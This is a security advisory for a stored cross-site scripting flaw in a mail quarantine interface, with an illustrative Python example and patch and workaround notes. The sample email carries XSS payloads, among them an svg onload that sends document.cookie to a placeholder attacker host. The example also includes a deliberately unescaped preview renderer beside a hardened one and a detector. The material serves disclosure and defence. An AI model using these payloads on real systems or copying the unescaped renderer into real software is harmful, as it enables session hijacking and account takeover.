Impact
A stored Cross-Site Scripting (XSS) vulnerability has been identified in the Quarantine UI. It affects administrators who use the Quarantine feature: an attacker can execute arbitrary JavaScript in the administrator's browser, within the context of the admin's authenticated session.
The attacker needs no access to the system beyond the ability to send mail. They send a crafted email containing JavaScript (for example, HTML markup with a script tag or an event-handler attribute), and the message is rendered without adequate output encoding when an administrator opens or previews it in the Quarantine UI. The injected script then runs with the administrator's privileges, which can lead to session compromise, unauthorized access, data manipulation, or further attacks against the system.
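To make the mechanism concrete, the following is an added example, not code from the affected project: a minimal quarantine preview written two ways, rendering a constructed email whose display name, subject and HTML body each carry a payload. The vulnerable renderer concatenates the fields into the page; the hardened one HTML-escapes every untrusted field. A small HTMLParser-based check then reports which rendering still contains live script tags or `on*` event handlers. The field layout, the helper names and the sample message are assumptions for illustration.

```python
import email
import html
from email import policy
from html.parser import HTMLParser

# Constructed sample message (not a real capture). All three displayed fields
# carry a payload; the body is text/html so a preview would render it as markup.
RAW_MESSAGE = b"""From: "<img src=x onerror=alert(1)>" <attacker@example.invalid>
To: admin@example.invalid
Subject: Invoice <script>alert(document.cookie)</script>
Content-Type: text/html; charset=utf-8

<p>Please review</p><svg onload="fetch('https://attacker.example.invalid/?c='+document.cookie)"></svg>
"""


def parse(raw: bytes):
    """Parse a raw RFC 5322 message with the modern (non-compat32) policy."""
    return email.message_from_bytes(raw, policy=policy.default)


def body_text(msg) -> str:
    """Return the preferred body part as a decoded string ('' if none)."""
    part = msg.get_body(preferencelist=("html", "plain"))
    return part.get_content() if part is not None else ""


def render_preview_vulnerable(msg) -> str:
    """Hypothetical vulnerable preview: message fields are dropped straight
    into the page, so any markup in the mail becomes live markup for the admin."""
    return (
        f"<div class='from'>{msg['From']}</div>"
        f"<div class='subject'>{msg['Subject']}</div>"
        f"<div class='body'>{body_text(msg)}</div>"
    )


def render_preview_hardened(msg) -> str:
    """Hardened preview: every untrusted field is HTML-escaped, so the payload
    is shown to the admin as inert text instead of being executed."""
    e = html.escape
    return (
        f"<div class='from'>{e(str(msg['From']))}</div>"
        f"<div class='subject'>{e(str(msg['Subject']))}</div>"
        f"<div class='body'>{e(body_text(msg))}</div>"
    )


class ActiveContentFinder(HTMLParser):
    """Collects script tags and on* event-handler attributes from rendered HTML.
    Escaped payloads never reach handle_starttag because they parse as text."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag} {name}")


def active_content(rendered: str) -> list[str]:
    """Return the list of executable constructs found in a rendered preview."""
    finder = ActiveContentFinder()
    finder.feed(rendered)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    msg = parse(RAW_MESSAGE)
    print("vulnerable:", active_content(render_preview_vulnerable(msg)))
    print("hardened:  ", active_content(render_preview_hardened(msg)))
```

Escaping the whole body is the safe default for a quarantine preview, where the administrator only needs to judge the message, not see it styled; a UI that must render HTML mail needs an allowlist-based sanitizer instead, and the check above is a useful regression test for either approach. Note that the sender display name and subject are as much an injection vector as the body, so every field the UI shows has to be encoded, not just the message content.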
Patches
Fixed in version 2023-11 and later versions.
Workarounds
Disable the Quarantine feature under System -> Configuration -> Options -> Quarantine until the patched version is installed.